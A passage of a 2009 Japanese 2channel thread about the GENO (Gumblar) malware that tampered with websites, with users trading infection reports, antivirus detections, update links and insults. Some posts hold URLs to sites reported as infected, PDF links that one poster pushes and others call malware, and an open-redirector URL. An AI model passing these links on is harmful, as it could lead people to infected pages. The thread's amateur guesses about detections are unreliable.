ってのと同じで、被害を広げない意味での対策としては非常に重要です。

セキュリティのセの字も知らない雑魚は黙ってなさい
687名無しさん@お腹いっぱい。:2009/06/05(金) 00:07:03
>>684
カルロス 乙
688名無しさん@お腹いっぱい。:2009/06/05(金) 01:01:40
>>686
JavaScriptの話は別として
そいつの話で問題なのはJavaを無効にすれば問題なしって話だろ
全く的外れに思えるが良いのかそれで?
689名無しさん@お腹いっぱい。:2009/06/05(金) 01:03:22
>>688
いいえ良くありません
JavaScriptとJavaはまったく別のものです
690名無しさん@お腹いっぱい。:2009/06/05(金) 01:04:27
じゃあなんでサイトの間違い直さないんだ
今は良いとしてGENOが復活したらまずいだろ
691名無しさん@お腹いっぱい。:2009/06/05(金) 01:06:37
>>688-690
雑魚は黙ってなさい
692名無しさん@お腹いっぱい。:2009/06/05(金) 01:07:18
ふざけてねえ出直せよ
693名無しさん@お腹いっぱい。:2009/06/05(金) 01:07:18
>>691
ごめんなさい
694名無しさん@お腹いっぱい。:2009/06/05(金) 01:07:56
もう封鎖したよ。潜在的な感染者はかなりいるだろうからまた新たに増やす意味も無い。

作った奴の予想以上に馬鹿が多かったって事だ
695名無しさん@お腹いっぱい。:2009/06/05(金) 01:10:49
なにを封鎖した?
迷惑サイト?
ならまだあるよな
GENOに限らないことだから間違ったままにしとくなよ
696名無しさん@お腹いっぱい。:2009/06/05(金) 01:13:04
偶然かもしれんがアフィのアマゾンリンク?クリックしたらリンク先でブラウザがクラッシュした
詳しい人調べてみて
697名無しさん@お腹いっぱい。:2009/06/05(金) 01:14:27
アンチが一気に沸いてきた



というより
アンチ:恐らく一名の活動時間になった

今週は忙しかったの?
698名無しさん@お腹いっぱい。:2009/06/05(金) 01:15:33
アンチとみせかけてクリックさせようとしてるんだろw
699名無しさん@お腹いっぱい。:2009/06/05(金) 01:16:19
ほらな?改行だろ
700名無しさん@お腹いっぱい。:2009/06/05(金) 01:18:04
同人テンプレにチェッカー追加するぐらい暇なんですね^^
701名無しさん@お腹いっぱい。:2009/06/05(金) 01:18:55
>>690
やぁチンピラくん。今日は改行しないのかい?サイトを直さない理由は、直す必要が無いからだろ。
ユーザ側でパッチを当てるなりして対策すれば解決できるものなら直す必要は無い。
702名無しさん@お腹いっぱい。:2009/06/05(金) 01:19:03
アフィは外せないけど運営鯖無料で貸せよ
703名無しさん@お腹いっぱい。:2009/06/05(金) 01:20:06
また句読点の人きたよー
704名無しさん@お腹いっぱい。:2009/06/05(金) 02:34:39
100%で安全なんだか危険なんだか統一したら
705名無しさん@お腹いっぱい。:2009/06/05(金) 02:36:56
雑魚は黙ってなさい
706名無しさん@お腹いっぱい。:2009/06/05(金) 02:43:24
[ad] [ad] [ad] >>>(オススメ度)>>>> [ad]
707名無しさん@お腹いっぱい。:2009/06/05(金) 03:04:30
>>704
100%を求めるなら世のソフトは全て危険
前科があるかないかで言ったばあい、JavaもJavaScriptもFlashもAdobeReaderもFoxitもOperaもFirefoxもIEもShockwaveもHTMLもMIMEも危険
危険性の高いミスの発見頻度で言えば、IEやFlashやAdobeReaderはまだまだ危険がいっぱい
708名無しさん@お腹いっぱい。:2009/06/05(金) 03:44:34
1000%が出た場合確実に感染しています。(05/29 02:425現在)
100%程度が出ても現状ではたぶん大丈夫です。(05/29 02:42現在)
↑の記述のことね
709名無しさん@お腹いっぱい。:2009/06/05(金) 03:46:08
>当方確認のGENOウイルスのみに関して05/30 07:47現在では100%(値を修正しました。)以外安全です。
どっちだよ
710名無しさん@お腹いっぱい。:2009/06/05(金) 04:06:00
雑魚は黙ってなさい
711名無しさん@お腹いっぱい。:2009/06/05(金) 04:45:49
そのコピペフレーズ見るたび、>>406で言われたのが、よっぽど悔しかった
んだろうなって透けてみえるから、使うのやめたほうがいいと思うよ。
712名無しさん@お腹いっぱい。:2009/06/05(金) 05:03:35
マジレスするとお前以外このスレ全部俺の自演なんだ
ごめんな(´・ω・`)
713名無しさん@お腹いっぱい。:2009/06/05(金) 05:03:48
見当外れなこと言われて悔しいわけないと思うが
単に馬鹿にしてるんじゃね
そんなこと理解できないとはおまえ本人か
714名無しさん@お腹いっぱい。:2009/06/05(金) 05:09:17
本人じゃなかったら新手の雑魚だろう
そんなことより早く直せよ
715名無しさん@お腹いっぱい。:2009/06/05(金) 05:58:56
こっちが静かだった間、セキュ板ですっごく伸びてたスレがあるんだけど
こっちが荒れだした途端、ピタッとレスが止まったよ。
これって、偶然かな?
716名無しさん@お腹いっぱい。:2009/06/05(金) 06:21:35
うん
偶然だよ
717名無しさん@お腹いっぱい。:2009/06/05(金) 06:29:15
よかった。安心した。
帰るところ無くなると、困っちゃうもんね。
718名無しさん@お腹いっぱい。:2009/06/05(金) 11:45:58
ぶっちゃけ複雑なJAVAスクリプト使ってるところはチェッカーに反応する
って前にも何度も何度も説明してたな
719名無しさん@お腹いっぱい。:2009/06/05(金) 11:50:02
役に立たない上にアフィリエイト付きかよ
720名無しさん@お腹いっぱい。:2009/06/05(金) 14:58:45
チェッカーから有意な結果を得るより
素人が自分でソース調べられるようになるほうが早いなw
721名無しさん@お腹いっぱい。:2009/06/05(金) 17:19:42
adobe readerはインストールしなくても問題ないんですか?
722名無しさん@お腹いっぱい。:2009/06/05(金) 18:32:21
それは、貴方次第です
723名無しさん@お腹いっぱい。:2009/06/05(金) 18:37:21
PDFファイルを使うことが無ければ必要ないんですよね。
adobe readerがインストールされていなければ問題は無いんですか。
ネットくらいしかしていないパソコンでもPDFファイルは使ってるものなんですか。
724名無しさん@お腹いっぱい。:2009/06/05(金) 18:48:01
ここでぱそこんのつかいかたを聞くなよ、よそでやれ
725名無しさん@お腹いっぱい。:2009/06/05(金) 19:17:43
すみません
726名無しさん@お腹いっぱい。:2009/06/05(金) 19:26:47
なんていうか、初心者互助キャンペーンは終了しましたよっていう流れですな
727名無しさん@お腹いっぱい。:2009/06/05(金) 23:50:53
もう次スレいらナイツ
728名無しさん@お腹いっぱい。:2009/06/06(土) 00:08:38
>>734
「ぱんつのかいかた」に見えた俺は疲れてるのかも試練
729名無しさん@お腹いっぱい。:2009/06/06(土) 01:08:41
相当疲れてるな
730名無しさん@お腹いっぱい。:2009/06/06(土) 02:01:01
なんかPCがおかしいと思って調べたら
これぽっいorz

いったい、いつ感染したんだよ
やっぱり再インストールしか方法ないのか?
731名無しさん@お腹いっぱい。:2009/06/06(土) 02:18:32
はい
732名無しさん@お腹いっぱい。:2009/06/06(土) 02:56:23
いいへ
733名無しさん@お腹いっぱい。:2009/06/06(土) 03:29:02
yes
734名無しさん@お腹いっぱい。:2009/06/06(土) 06:50:40
ぱんつのかいかた








↑疲れてないよそのままだよ>>728
735名無しさん@お腹いっぱい。:2009/06/06(土) 06:54:03
そこは
ぱんつのかいかた
で文章でも作るところだろ
センスねえな
736名無しさん@お腹いっぱい。:2009/06/06(土) 09:30:49
なるほど
737名無しさん@お腹いっぱい。:2009/06/06(土) 09:31:02
>>734-735
一晩ぐっすり寝たらテンション上がってきた
しまむらでぱんつ買ってくる!
738名無しさん@お腹いっぱい。:2009/06/06(土) 10:34:37
本スレの832だけど、GENOを語るスレ(パソコン一般板)
で全部押すとavastでトロイの木馬とか出るんだが
AVGとかノートンだと、どう?
739名無しさん@お腹いっぱい。:2009/06/06(土) 11:32:48
>>738
「全部押すと」の意味が分からんが、どうせコードが書き込まれただけだろ
いちいち気にせずにROMれ
740名無しさん@お腹いっぱい。:2009/06/06(土) 11:40:00
>>739
スマン、Avastスレ行って問題ないと
わかった
741名無しさん@お腹いっぱい。:2009/06/06(土) 11:49:31
「全部」押すと
じゃね?
742名無しさん@お腹いっぱい。:2009/06/06(土) 12:06:57
ああ、IEか
通りで
743名無しさん@お腹いっぱい。:2009/06/06(土) 12:16:41
2ちゃんねる専用ブラウザーで閲覧しているとは限らないから……
744740:2009/06/06(土) 12:23:28
使ってるブラウザはFirefoxなんだけど
パソコン一般板で、GENOのスレ31・32
両方で「全部」押すと警告出たからカキコした
ちなみにIE8でも、やっぱり警告出た
誤検出だと思うが…
745名無しさん@お腹いっぱい。:2009/06/06(土) 12:26:46
>>735
かけそばでっせ で縦読みしてしまったorz...
746名無しさん@お腹いっぱい。:2009/06/06(土) 14:00:33
直ったかも
>>32とaux2のファイルを上書きしたら
コマンドプロンプトとレジストリエディタ復活した
747名無しさん@お腹いっぱい。:2009/06/06(土) 14:19:54
>>744
IEでもFirefoxでも非専ブラという意味では同じです
748名無しさん@お腹いっぱい。:2009/06/06(土) 14:24:46
スクリプトの功罪やな。
749名無しさん@お腹いっぱい。:2009/06/06(土) 14:25:15
>>744
問題ないよ
750740:2009/06/06(土) 14:39:32
>>747・749
d
騒いで正直スマンかった
751730:2009/06/06(土) 15:17:31
軽くなったし、とりあえずこれで
様子を見ることにしよう
752名無しさん@お腹いっぱい。:2009/06/06(土) 16:10:21
よかったね
753名無しさん@お腹いっぱい。:2009/06/06(土) 23:02:47
10%も踏まないほうがいいの?
754名無しさん@お腹いっぱい。:2009/06/06(土) 23:03:11
踏んでもおk
755名無しさん@お腹いっぱい。:2009/06/06(土) 23:05:09
>>754
50%ぐらいだとやめたほうがいい?
756名無しさん@お腹いっぱい。:2009/06/06(土) 23:06:29
降水確率じゃないんだからw
757名無しさん@お腹いっぱい。:2009/06/06(土) 23:12:34
ソース見ればいい話
758名無しさん@お腹いっぱい。:2009/06/06(土) 23:15:27
アクセシしないとソースってみれないよね?
759名無しさん@お腹いっぱい。:2009/06/06(土) 23:16:14
ミス
アクセス
760名無しさん@お腹いっぱい。:2009/06/06(土) 23:19:16
>>756
>降水確率じゃないんだからw

降水確率ワロタw
761名無しさん@お腹いっぱい。:2009/06/06(土) 23:19:17
アクセシw
762名無しさん@お腹いっぱい。:2009/06/06(土) 23:19:46
何も面白くない
763名無しさん@お腹いっぱい。:2009/06/06(土) 23:23:24
>>758
右クリックとかで保存すれば?
764名無しさん@お腹いっぱい。:2009/06/06(土) 23:23:26
ああソースみれるサイト見つけた
なんて書いてあったらヤバイんだ?
765名無しさん@お腹いっぱい。:2009/06/06(土) 23:28:27
>>764
オタフク
766名無しさん@お腹いっぱい。:2009/06/06(土) 23:31:29
>>765
ここでソース見れた
ttp://so.7walker.net/guide.php
767名無しさん@お腹いっぱい。:2009/06/06(土) 23:32:27
宣伝市ね糞
768名無しさん@お腹いっぱい。:2009/06/06(土) 23:34:11
宣伝違うし
お前らどこでソース見てるの?
769名無しさん@お腹いっぱい。:2009/06/06(土) 23:38:36
http://www.aguse.jp/

普通にコレ貼れや
770名無しさん@お腹いっぱい。:2009/06/06(土) 23:39:20
>>769
そこソース見れないんだけど・・・
771名無しさん@お腹いっぱい。:2009/06/07(日) 01:53:14
私の場合は、いろいろなところの市販品を使ってきた後、今はAntiVirのフリー版に落ち着いています。
検知率はもとより、スキャンスピード、対ウイルス反応、軽さ、誤検知率の低さ、など勘案するとアンチウイルスソフトではAntiVirが最も優秀だと思います。
しかし、このソフトは日本語表示がない上、いろいろ設定が細かいということもあり、どうも一般の人たちには敷居が高いみたいです(事実avast!やAVG、キングソフトなど、他のフリーソフトに比べると使用率は低いと思います)。
他の某専門サイトなどでも、「このソフトはある程度スキルのある人しか使わない」などとコメントされていたりします。
もし、これが日本語対応になれば、その性能の良さと相まって利用者数は相当増加すると思うのですが・・・(確かに、周りでこのソフトを使っている人をみると、パソコン上級者といわれるような人たちの利用率が高いように思います)。

Aviraのフリー版についてですが、個人的にはデフォルトよりも自分で設定したほうが良いと思います。
何といっても、ウイルス発見時のあの音(?)はびっくりするので個人的にはこれはオフのほうが良いと思います。
ルートキット検索機能も確かデフォルトではオフなので、設定でオンにしていたほうが良いのではないでしょうか。
あと、ウイルスの処理も、設定であらかじめ指定した手順で処理させることもできるので、スキャンの終了までパソコンの前に居れず、手動で処理できない人はそちらに設定し直しても良いと思います。
フリー版のメールスキャンについては、一応メールを開くときに実行するそうです(ただし、これをメールスキャン機能と呼ぶかどうかは別問題ですが)。
あと、Aviraのヒューリスティック機能は最優秀らしいですが
設定は「中」で必要十分だと思います(デフォルトは「中」なので変える必要はないですが
772名無しさん@お腹いっぱい。:2009/06/07(日) 02:12:42
>>766のブログなんかよく分からないけど。汚ねぇHTMLだな。
ソースチェッカーとか付ける前に自分のソース直せよw
773名無しさん@お腹いっぱい。:2009/06/07(日) 02:16:51
ソースチェッカーオンラインは有名だと思うんだけど
774名無しさん@お腹いっぱい。:2009/06/07(日) 02:50:15
775名無しさん@お腹いっぱい。:2009/06/07(日) 02:52:04
だからPDF怖いって
776名無しさん@お腹いっぱい。:2009/06/07(日) 02:54:47
File 0220.pdf received on 2009.06.06 17:28:43 (UTC)
Current status: finished
Result: 0/40 (0%)
777名無しさん@お腹いっぱい。:2009/06/07(日) 03:33:28
31 名前:GENO ◆AbjB8MStDM [sage] 投稿日:2009/06/07(日) 02:21:44 ID:q5QX3JD60
セキュリティ初心者はまずこれを読め

http://u3.getuploader.com/akaiup/download/248/0218.pdf
http://u3.getuploader.com/mob/download/7/0219.pdf
http://www.tolucky.tv/uploader/src/0220.pdf

34 名前:名前欄にスレ名入力推奨@自治スレ[sage] 投稿日:2009/06/07(日) 02:58:35 ID:wm24k99x0
>>31
はいアウト
ウイルス配布は重大な犯罪だからな
これから数年間は警察の影におびえるといいよ

39 名前:GENO[sage] 投稿日:2009/06/07(日) 03:24:38 ID:dWjSklXY0
セキュリティパッチ当ててない奴は絶対踏むな
マジで危険

42 名前:GENO[sage] 投稿日:2009/06/07(日) 03:30:56 ID:dWjSklXY0
>>40
ID変えてご苦労様です
軽い気持ちで人生棒にふった気分はどうですか?
778名無しさん@お腹いっぱい。:2009/06/07(日) 04:06:37
44 名前:名前欄にスレ名入力推奨@自治スレ[sage] 投稿日:2009/06/07(日) 03:34:25 ID:g5tEWN8V0
>>42
File 0220.pdf received on 2009.06.06 17:28:43 (UTC)
Current status: finished
Result: 0/40 (0%)

47 名前:GENO[sage] 投稿日:2009/06/07(日) 03:55:50 ID:hoaxuigN0
流行中で自己書き換え型のマルウエアが
対策ソフト引っかからないなんてよくある話
どんだけおめでたい頭なんだよ

48 名前:GENO[sage] 投稿日:2009/06/07(日) 04:00:06 ID:M8NZAXqJ0
>>47
で、
飛び先は?IPAの注意喚起がマルウェアって証拠は?その根拠は?

49 名前:名前欄にスレ名入力推奨@自治スレ[sage] 投稿日:2009/06/07(日) 04:04:29 ID:2Yomg2r10
なぜ自分で確かめない
779775:2009/06/07(日) 04:51:46
え、ネタで言ったらマジだったのか。
よく見るとムダにアップローダとか胡散臭すぎるな・・・
踏まなくてよかったぁ
780名無しさん@お腹いっぱい。:2009/06/07(日) 05:06:51
そういう釣りはいいから
3つともヘッダから何まで普通のPDFファイル
781名無しさん@お腹いっぱい。:2009/06/07(日) 11:57:37
PG2 葱用ブロックリスト追加しました。
Virus Block_4.txt
http://uproda.2ch-library.com/lib136316.txt.shtml

782名無しさん@お腹いっぱい。:2009/06/07(日) 12:30:11
key?
783名無しさん@お腹いっぱい。:2009/06/07(日) 19:29:21
>>781
ウィルス
784名無しさん@お腹いっぱい。:2009/06/07(日) 19:35:47
>>781
頂戴しました、thx!!
785名無しさん@お腹いっぱい。:2009/06/07(日) 23:35:57
俺ももらった
IPなんかころころ変わるから気休め程度にしかならないだろうが
それでも何もやらないよりかは精神的にマシ
786名無しさん@お腹いっぱい。:2009/06/07(日) 23:39:01
てst
787名無しさん@お腹いっぱい。:2009/06/08(月) 13:39:03
今もGENOってやばいん?
788名無しさん@お腹いっぱい。:2009/06/08(月) 13:45:35
三菱自動車の「アイ・ミーブ」のページで仕様をPDFで閲覧したところ
FireFoxの動作がおかしくなったのでavastでスキャンしたら
「JS:Redirector-H [Trj]が発見されました」
とアバストたんが言ってるんですが。

@cmd.exeは実行可能
Aamd64_microsoft-windows-m..ents-mdac.resources_31bf3856ad364e35_6.1.7100.0_ja-jp_cda73122ed3dbaea_sqlsodbc.chm_92fe0a89

サイズは、101,136  ディスク上のサイズは、102,400 バイト
ja-jp_cda73122ed3dbaeaの部分が違うものが23個検索でヒット

OSはWindows 7 RC ヴィルド7100(64bit)
UACは ユーザがWindows設定を変更する場合は通知しない(上から1個下)
ルータ有り・PFWはWindows標準もの・セキュリティソフトはavast4.8HOME
AdobeReader9.1.1 AdobeFlash10.0.22.87 Java(TM)6 Update13 6.0.130

症状としては、ハイパーリンクをクリックしてもライブラリが表示されるだけで
リンク先が表示されない
Windowsのスタートメニュをクリックしても何も表示されない
PCを再起動するとこれらの症状は直るが、HDDがカリカリ言ってる
789名無しさん@お腹いっぱい。:2009/06/08(月) 14:01:10
>>788
開いてみたけど問題ないよ。
ダウンロードページのjsでunescape使ってるから、誤検知したんじゃね?

> 症状としては、ハイパーリンクをクリックしてもライブラリが表示されるだけで
> リンク先が表示されない

この意味がわからない。
790名無しさん@お腹いっぱい。:2009/06/08(月) 14:21:25
javaで小窓が開いてるのに気付いてないとか
ポップアップブロックで殺されてるとかじゃないかな?
791名無しさん@お腹いっぱい。:2009/06/08(月) 14:24:12
>>789
よかったぁ
tp://ev-life.com/index.html
ここのChangeTheDriveを見てて、上にあるメニュのトラクションコントロールをクリック
してもリンク先が表示されなかったので不審に思ってスキャンしてみたわけです
そうしたら上のような結果に。今もスキャン中です。
その直前にPDFでスペックを見ていたのでそれが原因かと思ったのですが
よく考えたら、GENOとPDF閲覧って関係なかったかも
誤検出だったのかなぁ
もう一度同じHPの項目クリックしてもちゃんと表示されるしなんだったんだろうか

リンク先が表示されずにライブラリ云々というのは、Windows7での新ライブラリの窓が
何故かHP上のテキストをクリックすると表示されるようになったのですよ
どのテキストリンクをクリックしても何故かライブラリが表示されるように。
やれれたと思ったのですが、誤検出でしたか。
とりあえず安心しました。
ありがとう
792名無しさん@お腹いっぱい。:2009/06/08(月) 15:38:09
cmdじゃなくてsqlsodbc.chmのほうを起動してみればいいのに
793名無しさん@お腹いっぱい。:2009/06/08(月) 16:35:29
しばらく来てなかったからわかんないんだけど、
なんでwikiのほうのまとめサイトをテンプレにいれないの?
アフィでも張ってあるの?それとも別の理由?
794名無しさん@お腹いっぱい。:2009/06/08(月) 16:41:46
GENOウイルススレ 感染4台目
http://pc11.2ch.net/test/read.cgi/internet/1243050166/
【報告専用】同人サイト向け・GENOウィルス注意11
http://changi.2ch.net/test/read.cgi/doujin/1244096936/
GENOウイルススレ ★21
http://pc11.2ch.net/test/read.cgi/sec/1243346768/

>>406
>>501
>>499
795名無しさん@お腹いっぱい。:2009/06/08(月) 17:35:03
既出か知らんがラジオフライヤーでググって一番上のが感染してるっぽい
796名無しさん@お腹いっぱい。:2009/06/08(月) 17:39:34
>>795
もろだな。感染確認した
797名無しさん@お腹いっぱい。:2009/06/08(月) 17:42:14
通常のGENOなら感染していても機能はしないから二次被害の心配はないはず
798名無しさん@お腹いっぱい。:2009/06/08(月) 17:59:05
>>797
でも、感染放置してるってことはftpパスを抜かれたままの状態だから、
htmlを再書き換え可能な状態なわけで、安心はできないよな。
799名無しさん@お腹いっぱい。:2009/06/08(月) 18:23:56
じゃあ今のうちにFTPソフトそのものを
削除したら良いんじゃね
更新はファイルマネージャで行うか
ブログに移行
800名無しさん@お腹いっぱい。:2009/06/08(月) 19:02:35
ESETです トロイの木馬だそうです

ttp://www.dotup.org/uploda/www.dotup.org107518.jpg.html
801名無しさん@お腹いっぱい。:2009/06/08(月) 20:04:16
いまどきトロイの木馬なんて古過ぎる三角木馬にしておけ
802名無しさん@お腹いっぱい。:2009/06/08(月) 20:55:16
こんなユーモアも糞も無い最低なレス久しぶりに見た
803名無しさん@お腹いっぱい。:2009/06/08(月) 21:04:10
お前もしかして王子か?
804名無しさん@お腹いっぱい。:2009/06/08(月) 22:11:52
木馬王子か
最悪過ぎるネーミングだ……
805名無しさん@お腹いっぱい。:2009/06/08(月) 22:29:56
木場王子かワラww^^
806名無しさん@お腹いっぱい。:2009/06/09(火) 03:01:57
>>803
おまえはGENOスレだけにゲロ王子だな。
807名無しさん@お腹いっぱい。:2009/06/09(火) 04:05:49
王子乙
808名無しさん@お腹いっぱい。:2009/06/09(火) 16:38:38
ウィキペディアにあやしげなものが

http://ja.wikipedia.org/wiki/%E7%89%B9%E5%88%A5:%E4%BC%9A%E8%A9%B1%E3%83%9A%E3%83%BC%E3%82%B8

グーグルで検索しようとしたらこうなった。


... コンピュータ ウィルスやスパイウェア アプリケーションの自動リクエストと類似したクエリが送信されました。
ユーザーを保護するため、このリクエストをすぐに処理することはできません。

できるだけ早くアクセスを復旧しますので、しばらくしてからもう一度お試しください。
お使いのコンピュータやネットワークがウィルスの被害にあっていると思われる場合は、
ウィルス チェッカーやスパイウェア削除ツールを実行して、システムからウィルスや不正ソフトウェアを駆除してください。
809名無しさん@お腹いっぱい。:2009/06/09(火) 16:48:09
最近落ち着いてきたな
対策分かればもう大丈夫か
始めに感染しちゃった人はご愁傷
810msq.asagaotv.ne.jp:2009/06/09(火) 17:06:25 BE:9904379-2BP(1236)
811msq.asagaotv.ne.jp:2009/06/09(火) 17:12:39 BE:5030584-2BP(1236)
812名無しさん@お腹いっぱい。:2009/06/09(火) 17:19:45
もう解決してない?
普通に飛べたんだけど…
813名無しさん@お腹いっぱい。:2009/06/09(火) 17:52:40
>>811
何をさっきからひとりで騒いでるんだよ?
どれもまったく問題なく開けるぞ。
Googleの検索ワードは何?

>>808のメッセージはお前のPCがウィルス感染の疑いありで、変なクエリーも
お前のPCから送信されているように読めるんだが。
814名無しさん@お腹いっぱい。:2009/06/09(火) 18:11:54
http://ja.wikipedia.org/wiki/%E7%89%B9%E5%88%A5:%E4%BC%9A%E8%A9%B1%E3%83%9A%E3%83%BC%E3%82%B8
というのをグーグルで検索したんでしょ。
815名無しさん@お腹いっぱい。:2009/06/09(火) 18:45:58
そんなもの検索してどうなるんだ
816名無しさん@お腹いっぱい。:2009/06/09(火) 19:51:04
817名無しさん@お腹いっぱい。:2009/06/10(水) 02:41:22
>>815
そのページにウィルスかスパイウェアでも仕込まれている可能性でも考えたんじゃね?
818名無しさん@お腹いっぱい。:2009/06/10(水) 04:45:28
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
GENOウイルススレ 感染4台目 [インターネット]
【ウイルス】GENOを語るスレ31【完治】 [パソコン一般]
【報告専用】同人サイト向け・GENOウィルス注意11 [同人]
乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般]
【ウイルス被害】GENOを語るスレ32【謝罪なし】 [パソコン一般]
819名無しさん@お腹いっぱい。:2009/06/10(水) 09:28:39
おまいら!うpだてしておけよー

Adobe Reader 9.1.2 Update - Multiple Languages
ttp://www.adobe.com/support/downloads/detail.jsp?ftpID=4486

2009 年 6 月のセキュリティ情報
ttp://www.microsoft.com/japan/technet/security/bulletin/ms09-jun.mspx
820名無しさん@お腹いっぱい。:2009/06/10(水) 09:50:11
なんかもう割とどうでもいい
821名無しさん@お腹いっぱい。:2009/06/10(水) 16:07:01
readerとは縁を切ったから俺もどうでもいいな
そんな事よりflashの方をupdateしろと
822名無しさん@お腹いっぱい。:2009/06/10(水) 17:03:52
>>819
これ入れたらもうJavaScriptは有効にしていいん?
823名無しさん@お腹いっぱい。:2009/06/10(水) 17:41:38
JavaScriptは基本的にOFF
824名無しさん@お腹いっぱい。:2009/06/10(水) 17:56:21
acrobat readerでjs使わないでしょ普通
825名無しさん@お腹いっぱい。:2009/06/10(水) 18:14:01
アドビッチのアプデは低速回線には辛いんだけど。
826名無しさん@お腹いっぱい。:2009/06/10(水) 19:39:20
低速回線のやつが蔑称使うなよ情けない
827名無しさん@お腹いっぱい。:2009/06/10(水) 20:33:59
acrobat readerなんてゴミアプリはそもそも不要
828名無しさん@お腹いっぱい。:2009/06/10(水) 20:41:40
社内、支社中をAdobeのアップデートしたばかりなのに

またかょ・・orz
829名無しさん@お腹いっぱい。:2009/06/10(水) 21:56:43
>>824>>827
acrobat readerじゃない、Adobe Readerだ。
830名無しさん@お腹いっぱい。:2009/06/10(水) 22:56:13
でもレジストリには未だにAcrobat Readerで登録されてるんだよね・・・
Adobe側もちゃんと統一しろよ、と。
831名無しさん@お腹いっぱい。:2009/06/11(木) 01:02:54
GENOウイルスまとめ
http://www29.atwiki.jp/geno/pages/13.html

の、左側メニューの「その他」にある

Googleキャッシュにはウィルスが残っているものがあるので注意が必要です

のリンクが危険と出るのですがウイルスなのでしょうか?
832名無しさん@お腹いっぱい。:2009/06/11(木) 08:25:10
rel="nofollow"
833名無しさん@お腹いっぱい。:2009/06/11(木) 16:39:06
ttp://blogs.technet.com/jpsecurity/default.aspx
>また、国内で Geno等を拡散しているWebサイトが(略

ここでもGenoと言えばマルウェアの名前ってことで認識されてるね
834名無しさん@お腹いっぱい。:2009/06/11(木) 21:53:26
genoでググると公式サイト以外全部ウィルス関連
もう名前変えるしかないだろこの店
835名無しさん@お腹いっぱい。:2009/06/11(木) 22:17:05
※既に一回変えてます
836名無しさん@お腹いっぱい。:2009/06/11(木) 23:14:04
>>835
一体何やらかしたんだ
837名無しさん@お腹いっぱい。:2009/06/12(金) 00:15:21
>>834
genoをgenoxなどに名前変えると、
genoウィルスもそれにあわせて名前かえるべきだろか、genoxウィルス
838名無しさん@お腹いっぱい。:2009/06/12(金) 04:12:34
桃の缶詰を買おうと思いまふ>Geno


閲覧しちゃったけど、平気?
839名無しさん@お腹いっぱい。:2009/06/12(金) 07:38:33
自己責任で・・
840名無しさん@お腹いっぱい。:2009/06/12(金) 08:03:13
>>836
倒産
841名無しさん@お腹いっぱい。:2009/06/13(土) 00:12:17
GENOウイルスのサイト改ざん被害、国内で400件以上確認される
http://internet.watch.impress.co.jp/cda/news/2009/06/12/23779.html
842名無しさん@お腹いっぱい。:2009/06/13(土) 00:15:45
無事感染してることを確認したんですが横に
sqlsodbc.chmxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
とかいうファイルがあって吹いた
843名無しさん@お腹いっぱい。:2009/06/13(土) 01:52:27
おまえ頭大丈夫か?
844名無しさん@お腹いっぱい。:2009/06/13(土) 10:23:19
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
GENOウイルススレ 感染4台目 [インターネット]
【報告専用】同人サイト向け・GENOウィルス注意11 [同人]
【ウイルス】GENOを語るスレ31【完治】 [パソコン一般]
【ウイルス被害】GENOを語るスレ32【謝罪なし】 [パソコン一般]
乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般]
845名無しさん@お腹いっぱい。:2009/06/13(土) 13:47:55
>乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般]
846名無しさん@お腹いっぱい。:2009/06/13(土) 13:56:39
男A「僕のPCが、GENOに感染しちゃったんだ・・・」
男B「何だって!?それは大変だ!よし、ちょっと見てやるから今すぐお前の家に行くぞ」
847名無しさん@お腹いっぱい。:2009/06/13(土) 16:46:45
>>845
それはいいけど、なぜあっちのスレのおすすめ2チャンネルにあの胸糞悪いスレの名が?
まあ騒ぎを沈静化しようと警笛ならしてた人もいるから、そっち側の人ならいいんだけど

>>846
それネタとして成立してるのか微妙だな
848名無しさん@お腹いっぱい。:2009/06/14(日) 07:58:56
暫く来てなかったんだが同人が騒いで18スレも伸びたのか?
849名無しさん@お腹いっぱい。:2009/06/14(日) 14:10:53
大体あってる
850名無しさん@お腹いっぱい。:2009/06/16(火) 00:43:30
ところで、GENOに汎用リダイレクタが置いてあるんだが。

http://www.geno-web.jp/junction.html?link=http://www.google.co.jp/
851名無しさん@お腹いっぱい。:2009/06/16(火) 00:53:06
(゚听)イラネ
852名無しさん@お腹いっぱい。:2009/06/16(火) 01:16:00
>>851
汎用リダイレクタは、接続先ドメインで安全確認する際に、リダイレクタ設置サイトで偽装できるって脆弱性
要る要らないじゃなくて、危険物
とはいってもそれを気にする奴に今更GENOを信用する奴はいないわけだが

googleも昔置いてたが、途中からクッションページで止まるように改善(リファラ隠しに使ってた人には改悪)された
I'm Feeling Luckyで飛ぶけどな!
853名無しさん@お腹いっぱい。:2009/06/16(火) 01:25:37
&btnI 使ってブラクラかなんか踏ませるイタズラが瞬間風速的に大人気になった結果…

…&btnI のトップが勇気スレになったことがあるw
854名無しさん@お腹いっぱい。:2009/06/16(火) 02:36:35
>>852
そんな情報いまさら(゚听)イラネ
って意味だとは思わないのか
教えてちゃんきめえ
855名無しさん@お腹いっぱい。:2009/06/16(火) 07:56:24
ここでaviraが反応したんだけど、皆反応する?
://www.e87.com/selection/sp_father/
(安全のためにhttp抜きました)
856名無しさん@お腹いっぱい。:2009/06/16(火) 08:44:51
>>855
hxxp://s.nakanohito.jp/bc/bivalves.js
これかな
857名無しさん@お腹いっぱい。:2009/06/16(火) 08:50:56
>>856
そうです、それです。ウイルス名を検索かけてもaviraのデーターベースにないので
もしかしたらGENOウイルスがまた改変して戻ってきたのかな、と
858名無しさん@お腹いっぱい。:2009/06/16(火) 09:05:08
>>857
ttp://www.ideaxidea.com/archives/2008/12/userinsight_1.html
スレチだけど誤検知と見ていい
ただのアクセス解析で害は無いと思う
859名無しさん@お腹いっぱい。:2009/06/16(火) 20:43:58
avast!が警告出したので鑑定スレで見てもらったら
「不正スクリプトが埋め込まれています。
通称 GENO ウイルスですが、接続先のドメインへは既に接続できなくなっています。
一応、PC有害。」だそうです。
感染しなかったから良かったものの、ただのそうめんのレシピサイトなのに・・・

(注意) ttp://www.mennoyamaichi.co.jp/soumen/recipe/index.html
860名無しさん@お腹いっぱい。:2009/06/16(火) 20:50:04
確かにそれっぽい物が埋め込まれてるな
861名無しさん@お腹いっぱい。:2009/06/16(火) 21:43:42
>>859
でた
Trojan-Downloader.JS.Gumblar.a
